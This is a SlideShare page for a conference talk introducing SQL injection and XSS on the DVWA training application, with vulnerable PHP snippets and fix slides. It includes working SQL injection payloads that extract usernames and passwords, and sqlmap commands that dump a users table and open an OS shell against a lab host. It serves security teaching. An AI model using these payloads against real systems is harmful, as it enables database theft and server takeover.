SlideShare a Scribd company logo

Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)

Grand Parade Poland
Grand Parade Poland

Presentation prepared by Paweł Cygal presented on Quality Questions Conference.

Technology
1 of 12
Download to read offline
/GrandParadePoland www.grandparade.co.uk SQL Injection and XSS - Basics with examples on Damn Vulnerable Web Application Paweł Cygal, Senior System Administrator at Grand Parade
/GrandParadePoland www.grandparade.co.uk Agenda: - What is SQL Injection? - SQLMAP - What is Cross site scripting ? - example of Session Hijacking
/GrandParadePoland www.grandparade.co.uk SQL Injectionl- SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. l- SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
/GrandParadePoland www.grandparade.co.uk XSS l- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications (but now always). XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
/GrandParadePoland www.grandparade.co.uk SQL Injection – what is wrong here? <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' ); // Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" ); // Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; // Increase loop count $i++; } mysql_close(); } ?>
/GrandParadePoland www.grandparade.co.uk Answer $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; In this example user can type anything for example: 1' or 1=1 -- Do not trust user input!!!
/GrandParadePoland www.grandparade.co.uk examples 1' or 1=1 -- 1' union select 1,2 from users; -- 1' union select version(),user() from users; -- 1' union select user,password from users; -- -1' union select user,password from users; -- -1' union select table_name,2 from information_schema.tables; -- -1' union select column_name,2 from information_schema.columns; -- -1' union select "zaslepka", concat(user,":",password) from users; -- SQLMAP: Current database: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=4k2qlghmpl74famhq4eejigki0; security=low' --current-db Lis of all databases: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --dbs Show tables: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa --tables Show colums: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users --columns Show user and pass sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users -C user,password --dump Insert shella: sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --current-db --os-shell
/GrandParadePoland www.grandparade.co.uk Solution - Prepared statements Placeholders - (WHERE a = ? ... WHERE a = :col) prepare execute - Stored procedurs - Escaping special chars mysql_real_escape_string
/GrandParadePoland www.grandparade.co.uk /GrandParadePoland www.grandparade.co.uk Cross site scripting – what is wrong here? <?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; } ?>
/GrandParadePoland www.grandparade.co.uk /GrandParadePoland www.grandparade.co.uk Answer No data validation for user input. User can type whatever he want For example HTML tags or some javascript code. Do not trust user!!!
/GrandParadePoland www.grandparade.co.uk /GrandParadePoland www.grandparade.co.uk Solution Eascape special chars - htmlspecialchars - addslashes Always validate input from user
/GrandParadePoland www.grandparade.co.uk The end Thank you

Recommended

XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2Tjylen Veselyj
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Sql Injection at Hashemite University
Sql Injection at Hashemite UniversitySql Injection at Hashemite University
Sql Injection at Hashemite UniversityYusuf Amro
 
Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Ömer Çıtak
 
Spring security integrate with mule
Spring security integrate with muleSpring security integrate with mule
Spring security integrate with muleSon Nguyen
 
Mule security - spring security manager
Mule security - spring security managerMule security - spring security manager
Mule security - spring security managerD.Rajesh Kumar
 

Recommended

XSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesXSS And SQL Injection Vulnerabilities
XSS And SQL Injection VulnerabilitiesMindfire Solutions
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2Tjylen Veselyj
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Sql Injection at Hashemite University
Sql Injection at Hashemite UniversitySql Injection at Hashemite University
Sql Injection at Hashemite UniversityYusuf Amro
 
Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Out-of-band SQL Injection Attacks (#cypsec'17)
Out-of-band SQL Injection Attacks (#cypsec'17)Ömer Çıtak
 
Spring security integrate with mule
Spring security integrate with muleSpring security integrate with mule
Spring security integrate with muleSon Nguyen
 
Mule security - spring security manager
Mule security - spring security managerMule security - spring security manager
Mule security - spring security managerD.Rajesh Kumar
 
Web security
Web securityWeb security
Web securityJames Akwuh
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안HyungTae Lim
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015gmaran23
 
Connection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksConnection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksChema Alonso
 
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...DevDay.org
 
Property place holder
Property place holderProperty place holder
Property place holdersivachandra mandalapu
 
Lviv js2017 (eleks)
Lviv js2017 (eleks)Lviv js2017 (eleks)
Lviv js2017 (eleks)Андрей Вандакуров
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Spring 3.0
Spring 3.0Spring 3.0
Spring 3.0Ved Prakash Gupta
 
Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionNazar Tymoshyk, CEH, Ph.D.
 
Validation
ValidationValidation
Validationsivachandra mandalapu
 
Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Vulners: Google for hackers
Vulners: Google for hackersVulners: Google for hackers
Vulners: Google for hackersKirill Ermakov
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...Grand Parade Poland
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basicsBlueinfy Solutions
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesiscorbanmiferreira
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAbhinav Nair
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attackschaitanya Lotankar
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 

More Related Content

What's hot

스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안HyungTae Lim
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015gmaran23
 
Connection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksConnection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksChema Alonso
 
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...DevDay.org
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Sumanth Damarla
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionNazar Tymoshyk, CEH, Ph.D.
 
Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Vulners: Google for hackers
Vulners: Google for hackersVulners: Google for hackers
Vulners: Google for hackersKirill Ermakov
 

What's hot (15)

Web security
Web securityWeb security
Web security
 
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안스프링 시큐리티로 시작하는 웹 어플리케이션 보안
스프링 시큐리티로 시작하는 웹 어플리케이션 보안
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy Queries
 
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
Beefing Up Security In ASP.NET Dot Net Bangalore 3rd meet up on May 16 2015
 
Connection String Parameter Pollution Attacks
Connection String Parameter Pollution AttacksConnection String Parameter Pollution Attacks
Connection String Parameter Pollution Attacks
 
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
[DevDay2018] Security Testing - By Thuy Nguyen, Software Engineer at Axon Act...
 
Property place holder
Property place holderProperty place holder
Property place holder
 
Lviv js2017 (eleks)
Lviv js2017 (eleks)Lviv js2017 (eleks)
Lviv js2017 (eleks)
 
Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018Securing the Web @DevDay Da Nang 2018
Securing the Web @DevDay Da Nang 2018
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Spring 3.0
Spring 3.0Spring 3.0
Spring 3.0
 
Black magic of web attacks Detection and Prevention
Black magic of web attacks Detection and PreventionBlack magic of web attacks Detection and Prevention
Black magic of web attacks Detection and Prevention
 
Validation
ValidationValidation
Validation
 
Sql injection
Sql injection Sql injection
Sql injection
 
Vulners: Google for hackers
Vulners: Google for hackersVulners: Google for hackers
Vulners: Google for hackers
 

Viewers also liked

Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...Grand Parade Poland
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesiscorbanmiferreira
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applicationsphanleson
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Dvwa low level
Dvwa low levelDvwa low level
Dvwa low levelhackstuff
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An IntroductionJayaseelan Vejayon
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKINGSHERALI445
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical HackingNeel Kamal
 

Viewers also liked (20)

Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasures
 
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
Mateusz Gruszczynski - Performance tests in Gatling (Quality Questions Confer...
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesis
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
Hacking web applications
Hacking web applicationsHacking web applications
Hacking web applications
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Dvwa low level
Dvwa low levelDvwa low level
Dvwa low level
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
Computer Hacking - An Introduction
Computer Hacking - An IntroductionComputer Hacking - An Introduction
Computer Hacking - An Introduction
 
Hacking
HackingHacking
Hacking
 
ETHICAL HACKING PPT
ETHICAL HACKING PPTETHICAL HACKING PPT
ETHICAL HACKING PPT
 
TYPES OF HACKING
TYPES OF HACKINGTYPES OF HACKING
TYPES OF HACKING
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 

Similar to Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)

Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSIvan Ortega
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
IRJET - SQL Injection: Attack & Mitigation
IRJET - SQL Injection: Attack & MitigationIRJET - SQL Injection: Attack & Mitigation
IRJET - SQL Injection: Attack & MitigationIRJET Journal
 
Web security 2010
Web security 2010Web security 2010
Web security 2010Alok Babu
 
Prevention of SQL Injection Attack in Web Application with Host Language
Prevention of SQL Injection Attack in Web Application with Host LanguagePrevention of SQL Injection Attack in Web Application with Host Language
Prevention of SQL Injection Attack in Web Application with Host LanguageIRJET Journal
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 
Security on Rails
Security on RailsSecurity on Rails
Security on RailsDavid Paluy
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injectionavishkarm
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoAditya K Sood
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Ravindra Singh Rathore
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012ZIONSECURITY
 

Similar to Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference) (20)

Sql injection
Sql injectionSql injection
Sql injection
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSSWeb Security - OWASP - SQL injection & Cross Site Scripting XSS
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
IRJET - SQL Injection: Attack & Mitigation
IRJET - SQL Injection: Attack & MitigationIRJET - SQL Injection: Attack & Mitigation
IRJET - SQL Injection: Attack & Mitigation
 
Web security 2010
Web security 2010Web security 2010
Web security 2010
 
ieee
ieeeieee
ieee
 
Prevention of SQL Injection Attack in Web Application with Host Language
Prevention of SQL Injection Attack in Web Application with Host LanguagePrevention of SQL Injection Attack in Web Application with Host Language
Prevention of SQL Injection Attack in Web Application with Host Language
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQL
 
D:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql InjectionD:\Technical\Ppt\Sql Injection
D:\Technical\Ppt\Sql Injection
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San Francisco
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)
 
OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012OWASP Top 10 vs Drupal - OWASP Benelux 2012
OWASP Top 10 vs Drupal - OWASP Benelux 2012
 

More from Grand Parade Poland

Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz SzepczyńskiMaking Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz SzepczyńskiGrand Parade Poland
 
Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)
Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)
Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)Grand Parade Poland
 
Css encapsulation strategies | Marcin Mazurek
Css encapsulation strategies | Marcin MazurekCss encapsulation strategies | Marcin Mazurek
Css encapsulation strategies | Marcin MazurekGrand Parade Poland
 
Reason - introduction to language and its ecosystem | Łukasz Strączyński
Reason - introduction to language and its ecosystem | Łukasz StrączyńskiReason - introduction to language and its ecosystem | Łukasz Strączyński
Reason - introduction to language and its ecosystem | Łukasz StrączyńskiGrand Parade Poland
 
Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)
Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)
Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)Grand Parade Poland
 
Introduction to React Native - Marcin Mazurek (09.06.2017)
Introduction to React Native - Marcin Mazurek (09.06.2017)Introduction to React Native - Marcin Mazurek (09.06.2017)
Introduction to React Native - Marcin Mazurek (09.06.2017)Grand Parade Poland
 
Reactive Programming with RxJava
Reactive Programming with RxJavaReactive Programming with RxJava
Reactive Programming with RxJavaGrand Parade Poland
 
Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)
Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)
Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)Grand Parade Poland
 
Rafał Machnik - CQRS as a performance and security booster (Quality Questions...
Rafał Machnik - CQRS as a performance and security booster (Quality Questions...Rafał Machnik - CQRS as a performance and security booster (Quality Questions...
Rafał Machnik - CQRS as a performance and security booster (Quality Questions...Grand Parade Poland
 
Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)
Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)
Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)Grand Parade Poland
 
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Grand Parade Poland
 
React-redux server side rendering enchanted with varnish-cache for the fastes...
React-redux server side rendering enchanted with varnish-cache for the fastes...React-redux server side rendering enchanted with varnish-cache for the fastes...
React-redux server side rendering enchanted with varnish-cache for the fastes...Grand Parade Poland
 
Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...
Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...
Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...Grand Parade Poland
 

More from Grand Parade Poland (13)

Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz SzepczyńskiMaking Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
Making Games in WebGL - Aro Wierzbowski & Tomasz Szepczyński
 
Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)
Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)
Mobile Team on Daily basis - Kamil Burczyk & Michał Ćwikliński (Mobiconf2017)
 
Css encapsulation strategies | Marcin Mazurek
Css encapsulation strategies | Marcin MazurekCss encapsulation strategies | Marcin Mazurek
Css encapsulation strategies | Marcin Mazurek
 
Reason - introduction to language and its ecosystem | Łukasz Strączyński
Reason - introduction to language and its ecosystem | Łukasz StrączyńskiReason - introduction to language and its ecosystem | Łukasz Strączyński
Reason - introduction to language and its ecosystem | Łukasz Strączyński
 
Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)
Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)
Thinking in Graphs - GraphQL problems and more - Maciej Rybaniec (23.06.2017)
 
Introduction to React Native - Marcin Mazurek (09.06.2017)
Introduction to React Native - Marcin Mazurek (09.06.2017)Introduction to React Native - Marcin Mazurek (09.06.2017)
Introduction to React Native - Marcin Mazurek (09.06.2017)
 
Reactive Programming with RxJava
Reactive Programming with RxJavaReactive Programming with RxJava
Reactive Programming with RxJava
 
Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)
Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)
Krzysztof Skarbinski - Automated tests in Python (Quality Questions Conference)
 
Rafał Machnik - CQRS as a performance and security booster (Quality Questions...
Rafał Machnik - CQRS as a performance and security booster (Quality Questions...Rafał Machnik - CQRS as a performance and security booster (Quality Questions...
Rafał Machnik - CQRS as a performance and security booster (Quality Questions...
 
Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)
Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)
Slawomir Kluz - ScalaTest from QA perspective (Quality Questions Conference)
 
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
Steve Bond - Managing the Threats in Online Gaming (Quality Questions Confere...
 
React-redux server side rendering enchanted with varnish-cache for the fastes...
React-redux server side rendering enchanted with varnish-cache for the fastes...React-redux server side rendering enchanted with varnish-cache for the fastes...
React-redux server side rendering enchanted with varnish-cache for the fastes...
 
Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...
Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...Wielomilionowy Ruch na Wordpressie - Łukasz Wilczak & Piotr Federowicz (WordC...
